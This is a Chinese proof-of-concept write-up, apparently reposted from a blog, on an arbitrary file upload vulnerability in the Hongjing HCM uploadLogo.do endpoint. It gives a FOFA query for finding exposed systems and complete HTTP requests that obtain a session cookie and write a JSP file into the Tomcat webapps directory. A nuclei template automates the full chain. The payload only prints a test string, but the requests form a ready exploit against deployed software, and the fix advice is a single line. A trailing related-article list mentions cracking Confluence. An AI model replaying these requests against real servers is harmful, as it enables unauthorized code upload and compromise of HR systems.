宏景HCM uploadLogo.do接口存在任意文件上传漏洞

文章目录

  • 免责声明
  • 漏洞描述
  • 搜索语法
  • 漏洞复现
  • nuclei
  • 修复建议

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

宏景HCM是一款基于先进的人力资本管理体系和灵活开放的技术架构的企业管理系统,提供了强大的业务模型定义、权限管理、工作流平台、预警平台等个性化配置工具。该uoloadLogo.do接口处存在任意文件上传漏洞
在这里插入图片描述

搜索语法

fofa

body='<div class="hj-hy-all-one-logo"'

漏洞复现

先进行cookie的获取

http://ip/module/system/qrcard/mobilewrite/qrcardmain.jsp

在这里插入图片描述
获取路径

POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host: 
User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Length: 635
Content-Type: multipart/form-data; boundary=09040231427371112abff3a2a34c3efe--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="path"--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="lfType"0
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="param"param
--09040231427371112abff3a2a34c3efe--

在这里插入图片描述
进行上传文件

POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host: 
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Length: 644------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"~2fopt~2fapache~2dtomcat~2d~39~2e~30~2e~33~33~2fwebapps~2fhrms~2f1.jsp
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--

访问`http://ip/1.jsp
在这里插入图片描述

nuclei

id: hongjingHC_uploadLogo.do_api_anyfile_upload
info:name: hongjingHC_uploadLogo.do_api_anyfile_uploadauthor: xlseverity: Critical
id: custom-upload-exploit
info:name: Custom Upload Exploit Detectionauthor: YourNameseverity: highdescription: |This template detects a potential vulnerability in the system by uploading a crafted file and checking if it can be executed.requests:- method: GETpath:- "/module/system/qrcard/mobilewrite/qrcardmain.jsp"headers:Host: "{{Hostname}}"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36Accept-Encoding: gzip, deflateConnection: keep-alivematchers-condition: andmatchers:- type: wordwords:- "JSESSIONID"extractors:- type: regexname: jsessionidpart: headerinternal: trueregex:- 'JSESSIONID=(.*);'- method: POSTpath:- "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closeCookie: "JSESSIONID={{jsessionid}}"body: |--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="path"--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="lfType"0--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="logofile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="twoFile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="param"param--09040231427371112abff3a2a34c3efe--matchers-condition: andmatchers:- type: statusstatus:- 200extractors:- type: regexname: upload_pathpart: bodyregex:- 'getElementById$"pathvalue"$.value="(.*?)"'group: 1- method: POSTpath:- "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closeCookie: "JSESSIONID={{jsessionid}}"Content-Type: "multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r"body: |------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="path"{{upload_path}}1.jsp------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="lfType"0------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="logofile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="twoFile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>------WebKitFormBoundaryfjKBvGWJbG07Z02r--- method: GETpath:- "{{upload_path}}1.jsp"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closematchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "<h1>Hello World!</h1>"

修复建议

更新到最新版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/475876.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux:confluence8.5.9的部署(下载+安装+pojie)离线部署全流程 遇到的问题

原文地址Linux&#xff1a;confluence8.5.9的部署&#xff08;下载安装破ji&#xff09;离线部署全流程_atlassian-agent-v1.3.1.zip-CSDN博客 背景&#xff1a;个人使用2核4g 内存扛不住 总是卡住&#xff0c;但是流程通了所以 直接公司开服务器干生产 个人是centos7 公司…

基于web的音乐网站(Java+SpringBoot+Mysql)

目录 1系统概述 1.1 研究背景 1.2研究目的 1.3系统设计思想 2相关技术 2.1 MYSQL数据库 2.2 B/S结构 2.3 Spring Boot框架简介 3系统分析 3.1可行性分析 3.1.1技术可行性 3.1.2经济可行性 3.1.3操作可行性 3.2系统性能分析 3.2.1 系统安全性 3.2.2 数据完整性 …

MATLAB绘图基础11:3D图形绘制

参考书&#xff1a;《 M A T L A B {\rm MATLAB} MATLAB与学术图表绘制》(关东升)。 11.3D图形绘制 11.1 3D图概述 M A T L A B {\rm MATLAB} MATLAB的 3 D {\rm 3D} 3D图主要有&#xff1a; 3 D {\rm 3D} 3D散点图、 3 D {\rm 3D} 3D线图、 3 D {\rm 3D} 3D曲面图、 3 D {\rm…

集合卡尔曼滤波(Ensemble Kalman Filter),用于二维滤波(模拟平面上的目标跟踪),MATLAB代码

集合卡尔曼滤波&#xff08;Ensemble Kalman Filter&#xff09; 文章目录 引言理论基础卡尔曼滤波集合卡尔曼滤波初始化预测步骤更新步骤卡尔曼增益更新集合 MATLAB 实现运行结果3. 应用领域结论 引言 集合卡尔曼滤波&#xff08;Ensemble Kalman Filter, EnKF&#xff09;是…

Bug:gomonkey系列问题(undefined: buildJmpDirective)

Bug&#xff1a;gomonkey系列问题(undefined: buildJmpDirective) 最近拉代码发现其他同事写单测使用的是gomonkey&#xff0c;我本地mac m3芯片执行报错&#xff0c;gomonkey: undefined: buildJmpDirective。 对go convey不熟悉的朋友可以看这篇文章&#xff1a; Go Convey测…

Arcgis 地图制作

地图如下,不同历史时期&#xff1a;

【AI编程实战】安装Cursor并3分钟实现Chrome插件(保姆级)

Cursor介绍 https://www.cursor.com/ 一句话介绍&#xff1a;AI代码编辑器&#xff0c;当前最火的AI编程器 软件下载与安装 下载 打开Cursor官网下载&#xff0c;会根据操作系统的差别进行选择 https://www.cursor.com/ 这里下载的内容很小&#xff0c;是个安装器&#x…

C指针之舞——指针探秘之旅(2)

❤博客主页&#xff1a;折枝寄北-CSDN博客 ❤专栏&#xff1a;C语言学习专栏 在上一篇博客文章&#xff1a;C指针之舞——指针探秘之旅-CSDN博客中&#xff0c;我们学习了字符指针&#xff0c;指针数组&#xff0c;数组指针&#xff0c;数组传参和指针传参等内容&#xff0c;…

大数据新视界 -- Impala 性能优化:量子计算启发下的数据加密与性能平衡(下)(30 / 30)

&#x1f496;&#x1f496;&#x1f496;亲爱的朋友们&#xff0c;热烈欢迎你们来到 青云交的博客&#xff01;能与你们在此邂逅&#xff0c;我满心欢喜&#xff0c;深感无比荣幸。在这个瞬息万变的时代&#xff0c;我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而 我的…

RPC框架负载均衡

什么是负载均衡&#xff1f; 当一个服务节点无法支撑现有的访问量时&#xff0c;会部署多个节点&#xff0c;组成一个集群&#xff0c;然后通过负载均衡&#xff0c;将请求分发给这个集群下的每个服务节点&#xff0c;从而达到多个服务节点共同分担请求压力的目的。 负载均衡主…

JMeter监听器与压测监控之 InfluxDB

1. 简介 在本文中&#xff0c;我们将介绍如何在 Kali Linux 上通过 Docker 安装 InfluxDB&#xff0c;并使用 JMeter 对其进行性能监控。InfluxDB 是一个高性能的时序数据库&#xff0c;而 JMeter 是一个开源的性能测试工具&#xff0c;可以用于对各种服务进行负载测试和性能监…

Banana Pi BPI-CanMV-K230D-Zero 采用嘉楠科技 K230D RISC-V芯片设计

概述 Banana Pi BPI-CanMV-K230D-Zero 采用嘉楠科技 K230D RISC-V芯片设计,探索 RISC-V Vector1.0 的前沿技术&#xff0c;选择嘉楠科技的 Canmv K230D Zero 开发板。这款创新的开发板是由嘉楠科技与香蕉派开源社区联合设计研发&#xff0c;搭载了先进的勘智 K230D 芯片。 K230…

如何判断注入点传参类型--理论

注入点传参类型 在我们找到注入点后&#xff0c;首先要判断传参的类型&#xff0c;才能以正确的形式向数据库查询数据。 注入点传参一般分为数字型和字符型。 数字型&#xff1a;当传入的参数为整形时&#xff0c;存在SQL注入漏洞&#xff0c;就可以认为是数字型注入。 字符…

HarmonyOS(57) UI性能优化

性能优化是APP开发绕不过的话题&#xff0c;那么在HarmonyOS开发过程中怎么进行性能优化呢&#xff1f;今天就来总结下相关知识点。 UI性能优化 1、避免在组件的生命周期内执行高耗时操作2、合理使用ResourceManager3、优先使用Builder方法代替自定义组件4、参考资料 1、避免在…

AI Prompt Engineering

AI Prompt Engineering 简介 Prompt Engineering, 提示工程&#xff0c;是人工智能领域的一项技术&#xff0c;它旨在通过设计高效的提示词&#xff08;prompts&#xff09;来优化生成式 AI&#xff08;如 GPT、DALLE 等&#xff09;的输出。提示词是用户与生成式 AI 交互的核…

NVR接入录像回放平台EasyCVR视频融合平台加油站监控应用场景与实际功能

在现代社会中&#xff0c;加油站作为重要的能源供应点&#xff0c;面临着安全监管与风险管理的双重挑战。为应对这些问题&#xff0c;安防监控平台EasyCVR推出了一套全面的加油站监控方案。该方案结合了智能分析网关V4的先进识别技术和EasyCVR视频监控平台的强大监控功能&#…

大语言模型中ReLU函数的计算过程及其函数介绍

文章目录 概要ReLU定义 概要 **ReLU 作用&#xff1a;**主要用于为神经网络引入非线性能力&#xff0c;作用是将输入中的整数保留原值&#xff0c;负数置为 0。 从而在层与层之间引入非线性&#xff0c;使神经网络能够拟合复杂的非线性关系。 **ReLU使用场景&#xff1a;**Lla…

【图像检测】深度学习与传统算法的区别(识别逻辑、学习能力、泛化能力)

识别逻辑 深度学习 使用了端到端的学习策略&#xff0c;直接学习从图像到检测结果的映射关系&#xff0c;自动提取特征&#xff0c;并且根据特征与特征之间的关系&#xff0c;计算出检测结果。 传统算法 则是人工提取特征&#xff0c;比如边缘特征&#xff0c;直线特征&#x…

C++-第25课-哈希表性能的分析

目录 一、哈希表概述 1. 什么是哈希表​编辑 2. 哈希表的优点 3. 哈希表的缺点 二、哈希函数 常见哈希函数 三. 哈希冲突的原因和解决方法 一.哈希冲突的原因 二、哈希冲突的解决方法 1. 链表法&#xff08;Separate Chaining&#xff09; 2. 开放寻址法&#xff08;…

HDMI数据传输三种使用场景

视频和音频的传输 在HDMI传输音频中有3种方式进行传输&#xff0c;第一种将音频和视频信号被嵌入到同一数据流中&#xff0c;通过一个TMDS&#xff08;Transition Minimized Differential Signaling&#xff09;通道传输。第二种ARC。第三张种eARC。这三种音频的传输在HDMI线中…